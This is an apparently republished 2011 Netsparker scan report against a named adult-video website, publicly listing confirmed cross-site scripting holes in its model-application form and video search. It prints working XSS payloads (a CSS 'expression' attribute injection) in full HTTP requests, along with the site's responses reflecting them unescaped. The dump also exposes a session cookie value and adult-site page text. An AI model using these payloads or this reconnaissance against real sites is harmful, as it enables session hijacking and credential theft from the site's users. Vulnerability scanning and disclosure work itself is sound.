www.pornhub.com, XSS, GHDB DORK REPORT SUMMARY

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Private Reporting of Security Research is preferred for Online Service Providers



Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.pornhub.com/
SCAN DATE
6/2/2011 5:08:28 AM
REPORT DATE
6/2/2011 8:56:57 AM
SCAN DURATION
00:22:17

Total Requests

13276

Average Speed

9.93 req/sec.
14
identified
10
confirmed
0
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
57 %
MEDIUM
7 %
LOW
21 %
INFORMATION
14 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/crossdomain.xml Open Policy Crossdomain.xml Identified Yes
/front/flash10bug [Possible] Internal IP Address Leakage No
/information E-mail Address Disclosure No
/model model_city POST Cross-site Scripting Yes
model_email POST Cross-site Scripting Yes
model_firstname POST Cross-site Scripting Yes
model_lastname POST Cross-site Scripting Yes
model_phone POST Cross-site Scripting Yes
/robots.txt Robots.txt Identified Yes
/user/search o GET Internal Server Error Yes
/video/search c GET Cross-site Scripting Yes
search GET Cross-site Scripting No
search GET Cross-site Scripting No
/view_video.php Cookie Not Marked As HttpOnly Yes
Cross-site Scripting

Cross-site Scripting

8 TOTAL
IMPORTANT
CONFIRMED
6
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST " stYle="x:expre/**/ssion(alert(9))
model_email POST netsparker@example.com
model_firstname POST Smith
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=fa6945c38bb84934b144c6d7dfb91e7c
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1675
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_1"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_2"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_3"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_4"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_5"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="available_6"

1
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_city"

" stYle="x:expre/**/ssion(netsparker(9))
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_firstname"

Smith
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_gender"

female
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_lastname"

Smith
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_moreinfo"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="model_phone"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic1"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic2"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic3"

3
--fa6945c38bb84934b144c6d7dfb91e7c
Content-Disposition: form-data; name="pic4"

3
--fa6945c38bb84934b144c6d7dfb91e7c--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:13:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4936
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. </p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST " stYle="x:expre/**/ssion(alert(9))
model_firstname POST Smith
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=a6c1b688aa854d36ab4f19da8629f727
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1654
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_1"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_2"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_3"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_4"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_5"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="available_6"

1
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_city"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_email"

" stYle="x:expre/**/ssion(netsparker(9))
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_firstname"

Smith
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_gender"

female
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_lastname"

Smith
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_moreinfo"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="model_phone"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic1"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic2"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic3"

3
--a6c1b688aa854d36ab4f19da8629f727
Content-Disposition: form-data; name="pic4"

3
--a6c1b688aa854d36ab4f19da8629f727--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:13:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4923
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information" style="border:1px solid red;">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
